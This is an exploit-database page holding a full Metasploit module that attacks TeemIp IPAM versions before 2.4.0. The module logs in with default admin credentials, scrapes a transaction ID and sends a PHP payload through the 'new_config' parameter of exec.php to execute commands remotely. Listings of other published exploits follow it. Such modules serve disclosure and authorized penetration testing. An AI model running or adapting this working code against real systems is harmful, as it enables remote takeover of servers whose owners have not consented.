Menu

Search for hundreds of thousands of exploits

"TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)"

Author

Exploit author

AkkuS

Platform

Exploit platform

php

Release date

Exploit published date

2019-04-03

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => "TeemIp IPAM < 2.4.0 - 'new_config' Command Injection",
      'Description' => %q(
        This module exploits a command injection vulnerability in TeemIp
        versions prior to 2.4.0. The "new_config" parameter of "exec.php" 
        allows you to create a new PHP file with the exception of config information.

        The malicious PHP code sent is executed instantaneously and is not saved on the server.
        The vulnerability can be exploited by an authorized user (Administrator).
        Module allows remote command execution by sending php payload with parameter 'new_config'.

      ),
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
        ],
      'References' =>
        [
          ['URL', 'http://pentest.com.tr/exploits/TeemIp-IPAM-2-4-0-new-config-Command-Injection-Metasploit.html']
        ],
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [['Automatic', {}]],
      'Privileged' => false,
      'DisclosureDate' => "Apr 03 2019",
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "Base TeemIp IPAM directory path", '/6']),
        OptString.new('USERNAME', [true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [false, "Password to authenticate with", 'admin'])
      ]
    )
  end
##
# Login and cookie information gathering
##
  def do_login

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'pages', 'UI.php'),
      'vars_post' => {
        'auth_user' => datastore['username'],
        'auth_pwd' => datastore['password'],
        'loginop' => 'login'
      }
    )

    unless res
      fail_with(Failure::Unreachable, 'Connection error occurred!')
    end

    if res.code == 200 && (res.body =~ /Logged in as/)
      print_good("Authentication was successful")
      @cookies = res.get_cookies
      return 
    else
      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')     
    end  
  end

  def peer
    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end
##
# Exploitation process with prepared information
##
  def exploit
    unless Exploit::CheckCode::Appears == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    @cookies = nil
    do_login

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri, 'pages', 'exec.php?exec_module=itop-config&exec_page=config.php&exec_env=production&c%5Bmenu%5D=ConfigEditor'),
      'headers' => {
        'Cookie' => @cookies
      }
    )

    if res and res.code == 200 and res.body =~ /Identify yourself/
      return do_login
    else 
      transid = res.body.split('transaction_id" value="')[1].split('"')[0]
      print_good("transaction_id : #{transid}")
    end

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri, 'pages', 'exec.php?exec_module=itop-config&exec_page=config.php&exec_env=production&c%5Bmenu%5D=ConfigEditor'),
      'vars_post' => {
          "operation" => "save",
          "transaction_id" => transid,
          "prev_config" => "exec",
          "new_config" => payload.encoded
       },
      'headers' => {
        'Cookie' => @cookies
      }
    )
    handler

  end
##
# Version and Vulnerability Check
##
  def check

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'pages', 'ajax.render.php'),
      'vars_post' => {
          "operation" => "about_box"
      }
    )

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 200
      version = res.body.split('iTop version ')[1].split('" src=')[0]
      if version < '2.4.1'
       print_status("#{peer} - Teemip Version is #{version}")
       return Exploit::CheckCode::Appears
      end
    end

    return Exploit::CheckCode::Safe
  end
##
# End
##
end
Release DateTitleTypePlatformAuthor
2020-02-14"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-14"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection"webappsphpJ3rryBl4nks
2020-02-13"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin tutor.1.5.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin wordfence.7.4.5 - Local File Disclosure"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload"webappsphp"Mehran Feizi"
2020-02-13"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-13"PANDORAFMS 7.0 - Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-02-12"HP System Event Utility - Local Privilege Escalation"localwindowshyp3rlinx
2020-02-12"MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow"localwindowsZwX
2020-02-11"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting"webappscgiLuca.Chiou
2020-02-11"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting"webappsphp"Sayak Naskar"
2020-02-11"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)"webappsphpMetasploit
2020-02-11"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path"localwindowsboku
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2020-02-11"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path"localwindowsboku
2020-02-11"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow"localwindowsZwX
2020-02-11"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path"localwindowsboku
2020-02-11"Torrent iPod Video Converter 1.51 - Stack Overflow"localwindowsboku
2020-02-10"LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-02-10"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow"localwindowsZwX
Release DateTitleTypePlatformAuthor
2020-02-14"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection"webappsphpJ3rryBl4nks
2020-02-13"Wordpress Plugin wordfence.7.4.5 - Local File Disclosure"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting"webappsphp"Mehran Feizi"
2020-02-13"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin tutor.1.5.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"PANDORAFMS 7.0 - Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-02-13"Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload"webappsphp"Mehran Feizi"
2020-02-11"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting"webappsphp"Sayak Naskar"
2020-02-11"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)"webappsphpMetasploit
2020-02-10"LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-02-07"EyesOfNetwork 5.3 - Remote Code Execution"webappsphp"Clément Billac"
2020-02-07"QuickDate 1.3.2 - SQL Injection"webappsphp"Ihsan Sencan"
2020-02-07"VehicleWorkshop 1.0 - 'bookingid' SQL Injection"webappsphp"Mehran Feizi"
2020-02-07"PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection"webappsphp"Amel BOUZIANE-LEBLOND"
2020-02-06"Online Job Portal 1.0 - 'user_email' SQL Injection"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - Remote Code Execution"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - Cross Site Request Forgery (Add User)"webappsphp"Ihsan Sencan"
2020-02-06"Ecommerce Systempay 1.0 - Production KEY Brute Force"webappsphplive3
2020-02-04"Centreon 19.10.5 - 'Pollers' Remote Command Execution (Metasploit)"webappsphpmekhalleh
2020-02-03"phpList 3.5.0 - Authentication Bypass"webappsphp"Suvadip Kar"
2020-02-03"School ERP System 1.0 - Cross Site Request Forgery (Add Admin)"webappsphpJ3rryBl4nks
2020-02-03"IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting"webappsphp"Lutfu Mert Ceylan"
2020-01-31"Lotus Core CMS 1.0.1 - Local File Inclusion"webappsphp"Daniel Monzón"
2020-01-31"FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)"webappsphp"Ismail Tasdelen"
2020-01-30"PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass"localphpmm0r1
2020-01-30"rConfig 3.9.3 - Authenticated Remote Code Execution"webappsphpvikingfr
2020-01-29"Centreon 19.10.5 - 'Pollers' Remote Command Execution"webappsphp"Omri Baso"
2020-01-29"Centreon 19.10.5 - 'centreontrapd' Remote Command Execution"webappsphp"Fabien AUNAY"
2020-01-29"Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)"webappsphpJ3rryBl4nks
2020-01-28"Octeth Oempro 4.8 - 'CampaignID' SQL Injection"webappsphp"Bruno de Barros Bulle"
Release DateTitleTypePlatformAuthor
2019-08-12"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)"remotelinuxAkkuS
2019-08-12"ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)"remotemultipleAkkuS
2019-08-12"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)"remotemultipleAkkuS
2019-08-12"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)"remotemultipleAkkuS
2019-07-12"Sahi Pro 8.0.0 - Remote Command Execution"webappsjavaAkkuS
2019-06-17"AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)"remotephpAkkuS
2019-06-11"Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)"remotelinuxAkkuS
2019-05-14"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)"remotephpAkkuS
2019-04-30"Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)"remotephpAkkuS
2019-04-25"osTicket 1.11 - Cross-Site Scripting / Local File Inclusion"webappsphpAkkuS
2019-04-22"ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)"remotemultipleAkkuS
2019-04-18"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)"remotewindowsAkkuS
2019-04-15"CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)"remotephpAkkuS
2019-04-12"ATutor < 2.2.4 - 'file_manager' Remote Code Execution (Metasploit)"webappsphpAkkuS
2019-04-03"TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)"remotephpAkkuS
2019-03-11"OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)"webappsjspAkkuS
2019-03-11"Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)"webappsmultipleAkkuS
2019-03-07"QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)"remotehardwareAkkuS
2019-03-04"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)"webappsphpAkkuS
2019-02-28"Usermin 1.750 - Remote Command Execution (Metasploit)"webappslinuxAkkuS
2019-02-28"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)"webappsphpAkkuS
2019-02-12"Jenkins 2.150.2 - Remote Command Execution (Metasploit)"webappslinuxAkkuS
2019-01-24"SirsiDynix e-Library 3.5.x - Cross-Site Scripting"webappscgiAkkuS
2019-01-18"Webmin 1.900 - Remote Command Execution (Metasploit)"remotecgiAkkuS
2019-01-10"eBrigade ERP 4.5 - Arbitrary File Download"webappsphpAkkuS
2019-01-02"Vtiger CRM 7.1.0 - Remote Code Execution"webappsphpAkkuS
2018-12-19"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)"webappsphpAkkuS
2018-12-09"i-doit CMDB 1.11.2 - Remote Code Execution"webappsphpAkkuS
2018-12-04"Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting"webappsphpAkkuS
2018-12-03"Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution"webappsphpAkkuS
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46641/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse